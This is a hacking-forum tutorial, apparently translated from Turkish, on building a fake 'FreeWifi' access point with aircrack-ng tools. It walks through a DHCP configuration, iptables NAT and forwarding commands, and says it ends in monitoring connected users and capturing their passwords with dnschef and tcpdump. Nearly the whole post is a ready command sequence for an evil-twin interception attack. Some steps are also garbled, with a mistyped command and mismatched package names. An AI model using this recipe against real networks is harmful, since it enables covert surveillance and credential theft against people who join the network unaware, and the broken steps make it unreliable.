Creating A Fake Wireless Network

Dolyetyus

Co Admin
21 Nis 2020
1,207
670
Delft
NZr505.png


What Is Aircrack-ng?

We can admit that Aircrack-ng is a packet sniffer or a detector that breaks WEP and WPA/WPA2 passwords. There are some commands we need to learn while using the Aircrack tool. These are;

"airodump-ng" , "aireplay-ng" , "aircrack-ng" and "airdecap-ng" which are the commands we will see in this tutorial.

NZr505.png


Creating A Fake Wireless Network Using Aircrack

Let's open our terminal and start with our first command.

Kod:
ifconfig

Ekran-Alintisi1.jpg


NZr505.png


WLAN14 means our network adapter.

Now let's use our network adapter for creating the fake access point and create a virtual interface with our airmon-ng tool and start our connection.

NZr505.png


Kod:
airmon-ng start wlan14

Ekran-Alintisi2.jpg


You can now use our network adapter to make wiretaps or fake access points,
Let's create a virtual interface with the airmon-ng tool and start our related connection,

An interface called mon1 has been created, let's test it, let's see if our wireless networks around appear, But let's write the following command to prevent it from failing without doing it,

NZr505.png


Kod:
modprobe r8187se

Ekran-Alintisi3.jpg


Then let's test our mon1 interface,

NZr505.png


Kod:
airodum-ng mon1

Ekran-Alintisi4.jpg


We set up our DHCP server to give IP to people who will connect to this network.

NZr505.png


Kod:
apt-get install dhcp3-server

Ekran-Alintisi5.jpg


If not, download this file to manually download http://oemsources.volumio.org/brystonair/1.365/isc-dhcp-server.tar.gz

Then let's write this command

NZr505.png


Kod:
tar -xvf isc-dhcp-server.tar.gz -C /test

Ekran-Alintisi6.jpg


After our .dep package is installed, then let's reboot the system.

NZr505.png


Kod:
dpkg -i isc.dhcp.server.dep

Ekran-Alintisi7.jpg


NZr505.png


Kod:
reboot

Ekran-Alintisi8.jpg


Then let's edit the conf file of our dhcp service to give the IP range.

NZr505.png


Kod:
nano /etc/dhcp3/dhcpd.conf

Ekran-Alintisi9.jpg


and directly copy-paste this part.

ddns-update-style ad-hoc; //If the service will not work, we will remove this part later.
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}

Then let's create the wireless network with the airbase-ng command.

NZr505.png


Kod:
airbase-ng -e FreeWifi -c 11 -v wlan1 &

Ekran-Alintisi10.jpg


Let's download the virtual interface called at0

NZr505.png


Kod:
ifconfig at0 up

Ekran-Alintisi11.jpg


Kod:
ifconfig at0 10.0.0.254 netmask 255.255.255.0

Ekran-Alintisi12.jpg


Let's write the route command,

NZr505.png


Kod:
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

Ekran-Alintisi13.jpg


Then let's set our iptable settings,

NZr505.png


Kod:
iptables --flush

Ekran-Alintisi14.jpg


Kod:
iptables --table nat --flush

Ekran-Alintisi15.jpg


Kod:
iptables --delete-chain

Ekran-Alintisi16.jpg


NZr505.png


Kod:
iptables -P FORWARD ACCEPT

Ekran-Alintisi17.jpg


Let's redirect future links.

NZr505.png


Kod:
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Ekran-Alintisi18.jpg


Let's start the DHCP Server,

NZr505.png


Kod:
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

Ekran-Alintisi19.jpg


Let's direct our IPs to switch.

NZr505.png


Kod:
echo "1" > /proc/sys/net/ipv4/ip_forward

After you get to these steps, do the necessary, checking tests. In this way, we can get the IP of a user and monitor it. We can get password information in http traffic by dns routing with dnschef and by tcpdump.

NZr505.png





Directly Translated From The Original Topic: https://www.turkhackteam.org/network/1948609-sahte-kablosuz-agi-olusturmak.html
Original Author: kanserojen
Translator: Dolyetyus
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.